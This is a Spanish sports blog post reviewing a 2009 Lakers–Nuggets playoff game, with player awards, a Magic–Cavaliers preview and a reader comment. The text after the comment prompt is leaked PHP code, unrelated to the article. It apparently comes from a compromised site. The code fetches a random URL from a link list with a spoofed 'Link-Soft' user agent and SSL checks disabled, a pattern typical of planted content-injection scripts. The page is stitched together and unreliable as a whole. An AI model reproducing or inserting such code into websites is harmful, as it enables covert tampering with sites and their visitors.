Playoffs (27/05/2009): Subidón Odom

28 de May de 2009 por TheDeerHunter

odomshoutEs curioso que haya habido tanto debate sobre el peso ofensivo de Gasol, el número de tiros que ha podido jugarse y las causas de que sus compañeros, especialmente Kobe, no terminaran de encontrarle, sobre los castigos desmedidos de Phil Jackson a Odom o Shannon Brown, que parecían proscritos definitivamente, o sobre la brecha insalvable entre Kobe & Gasol y el resto…

Anoche todo cambió de repente, a partir de 5 minutos para el final del tercer cuarto, con los Lakers 5 abajo. No es que hasta ese momento hubieran jugado mal. El toma y daca típico de estas series, sin excesivo control del juego, pero con Billups, JR Smith, Andersen o Nené bien vigilados. Por el contrario, una contribución bastante eficaz, por una vez, de todos. Bynum mostrando detalles de calidad, Fisher anotando… o incluso Vujacic en su fugaz aparición para empatar el partido en el descanso. Gasol y Kobe se mostraban incluso excesivamente generosos, hasta casi llegar a la temeridad.

Pero fue en ese instante cuando aparecieron los mejores Lakers de esta temporada, y lo hicieron desde la defensa y con Gasol como referente. Monumental. 19 a 3 de parcial entre ese final de cuarto y el principio del último. Y ahí aparecieron Shannon Brown volando sobre Andersen y lanzado como un perro de presa sobre Billups, Walton centradísimo, todo inteligencia y anticipación, y Odom como ejecutor del gran trabajo colectivo cerrando el rebote. En ataque, con todos buscándole hasta la obsesión, mucho más liberado que Gasol y Kobe, terminó por renacer aunque sólo fuera por insistencia. Mucho juego por dentro y las ideas claras. El Odom intenso y resolutivo que se espera de él. A todo esto, ayudó también la rigurosidad en las faltas señaladas a Nenê.

melohardkobeGasol y Kobe hicieron menos falta que nunca en la anotación, porque todos tiraron del carro y ellos sudaron para que así fuera. Además de Odom, Ariza y Fisher en dobles figuras de anotación, Bynum a las puertas y el resto, impecables en tareas defensivas por primera vez en toda la postemporada. Ya tocaba. Las posibilidades de este equipo pasan por el colectivo. Sus dos mejores jugadores, por buenos que sean, no pueden considerarse favoritos a nada. La faceta generosa también es algo que nos encanta de Gasol y Kobe. A ver si todo va a formar parte del plan maestro de Phil Jackson y nosotros, aquí, rajando de él…

PREMIOS

MVP: Decíamos recientemente que Odom ni estaba ni ya casi se le esperaba. Precisamente por eso su impacto en el partido de anoche fue brutal. Ni siquiera su maltrecha espalda pudo frenar la intensidad que el neoyorquino ofreció por primera vez en toda la serie y que llevó en volandas a los Lakers en el tramo decisivo. Odom anotó 19 puntos, cogió 14 rebotes, puso 4 tapones y dio 3 asistencias, además de cosechar un parcial de +18 en sus 32 minutos de juego. Mención especial para el gran trabajo de Gasol bajo los aros, con 10 rebotes y 5 tapones.

La sorpresa: No sabemos qué nos sorprendió más, si Kobe renunciando a un triple completamente solo para regalar la canasta a Odom con una maravillosa asistencia o Kenyon Martin anotando dos lanzamientos consecutivos desde 5 metros. Sí, definitivamente, lo segundo.

La decepción: Tres de los grandes responsables del triunfo de los Nuggets en el cuarto partido, Billups, Andersen y Smith, fueron de lo más intrascendente anoche. JR siguió lanzando triples como si le fuera la vida en ello, salvo que esta vez no entraron (1 de 10). Andersen ofreció sólo 2 puntos y 8 rebotes, y pese a sus 4 tapones no logró levantar a su equipo como en otras ocasiones y se llevó odombirdmanpauademás un espectacular mate de Shannon Brown que encendió el Staples en el tramo final del tercer cuarto. Billups, por su parte, se quedó en 12 puntos y 5 asistencias, muy poca cosa para un jugador de su categoría.

El mayor esfuerzo en vano: Anoche Carmelo se quedó solo. Nadie acompañó sus 31 puntos, a los que añadió 4 rebotes y 4 asistencias, y su equipo se encuentra ahora entre la espada y la pared.

RAZONES PARA TRASNOCHAR

Magic @ Cavs (2.30 horas). LeBron y sus Cavaliers tratarán esta noche de salvar su primer match ball en contra y alargar una serie que parece muy decantada del lado de los Magic. Sin embargo, tras cuatro partidos de infarto y dado el nivel de juego de James en todos ellos, no hay que descartar que, con un poco de ayuda de algunos de los secundarios (Williams, West o Ilgauskas), El Elegido sea capaz de rescatar a los suyos. Está por ver si a los Magic no les entra el vértigo de verse a un solo paso de las Finales, que no sería el primer equipo al que le ocurre. Si siguen jugando con el descaro con el que lo han hecho hasta el momento, los Cavaliers necesitarán más de un milagro de su jugador franquicia para tener opciones.

Comenta

Un comentario a esta entrada

  1. MagicJohnson32 dice:
    #1

    Al fin Odom se quitó el disfraz de hombre invisible… Más vale tarde que nunca.

    Y al fin vimos a los Lakers jugar con auténtico fervor. Contribuyeron sobre todo Odom y Shannon Brown, además del liderazgo de Kobe y Pau para lograr que el resto estuviesen involucrados.

    La cosa es que sigue pareciendo que, cuando los Lakers lo necesitan de verdad, son capaces de meter una marcha más que el rival.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>